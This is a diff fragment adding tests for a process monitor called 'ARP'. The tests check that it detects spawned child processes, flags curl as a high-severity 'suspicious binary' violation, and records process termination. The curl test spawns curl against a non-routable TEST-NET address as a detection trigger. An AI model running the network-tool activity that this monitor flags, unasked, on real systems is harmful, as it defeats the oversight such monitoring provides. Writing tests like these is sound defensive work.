|
|
43
|
+
|
|
44
|
+
it('should detect a new child process spawned after ARP starts', async () => {
|
|
45
|
+
// Spawn a real long-running child process
|
|
46
|
+
const child = spawn('sleep', ['30'], { stdio: 'ignore' });
|
|
47
|
+
children.push(child);
|
|
48
|
+
|
|
49
|
+
// Wait for the process monitor to detect the new child
|
|
50
|
+
const event = await arp.waitForEvent(
|
|
51
|
+
(e) => e.source === 'process' && e.data.pid === child.pid,
|
|
52
|
+
10000,
|
|
53
|
+
);
|
|
54
|
+
|
|
55
|
+
expect(event).toBeDefined();
|
|
56
|
+
expect(event.source).toBe('process');
|
|
57
|
+
expect(event.data.pid).toBe(child.pid);
|
|
58
|
+
});
|
|
59
|
+
|
|
60
|
+
it('should detect a suspicious binary (curl) as a violation', async () => {
|
|
61
|
+
// Spawn curl against a non-routable TEST-NET address — it stays alive trying to connect
|
|
62
|
+
const child = spawn('curl', ['-s', '--connect-timeout', '30', 'http://192.0.2.1/'], {
|
|
63
|
+
stdio: 'ignore',
|
|
64
|
+
});
|
|
65
|
+
children.push(child);
|
|
66
|
+
|
|
67
|
+
// Wait for the suspicious binary detection
|
|
68
|
+
const event = await arp.waitForEvent(
|
|
69
|
+
(e) =>
|
|
70
|
+
e.source === 'process' &&
|
|
71
|
+
e.category === 'violation' &&
|
|
72
|
+
e.data.binary === 'curl',
|
|
73
|
+
10000,
|
|
74
|
+
);
|
|
75
|
+
|
|
76
|
+
expect(event).toBeDefined();
|
|
77
|
+
expect(event.category).toBe('violation');
|
|
78
|
+
expect(event.severity).toBe('high');
|
|
79
|
+
expect(event.data.binary).toBe('curl');
|
|
80
|
+
expect(event.data.pid).toBe(child.pid);
|
|
81
|
+
});
|
|
82
|
+
|
|
83
|
+
it('should detect process termination', async () => {
|
|
84
|
+
// Spawn a short-lived process
|
|
85
|
+
const child = spawn('sleep', ['1'], { stdio: 'ignore' });
|
|
86
|
+
children.push(child);
|
|
87
|
+
|
|
88
|
+
// Wait for the initial detection
|
|
89
|
+
await arp.waitForEvent(
|
|
90
|
+
(e) => e.source === 'process' && e.data.pid === child.pid,
|
|
91
|
+
10000,
|
|
92
|
+
);
|
|
93
|
+
|
|
94
|
+
// Now wait for the termination event (sleep 1 ends after 1s)
|
|
95
|
+
const termEvent = await arp.waitForEvent(
|
|
96
|
+
(e) =>
|
|
97
|
+
e.source === 'process' &&
|
|
98
|
+
e.data.pid === child.pid &&
|
|
99
|
+
e.data.action === 'terminated',
|
|
100
|
+
10000,
|
|
101
|
+
);
|
|
102
|
+
|
|
103
|
+
expect(termEvent).toBeDefined();
|
|
104
|
+
expect(termEvent.data.action).toBe('terminated');
|
|
105
|
+
});
|
|
106
|
+
});
|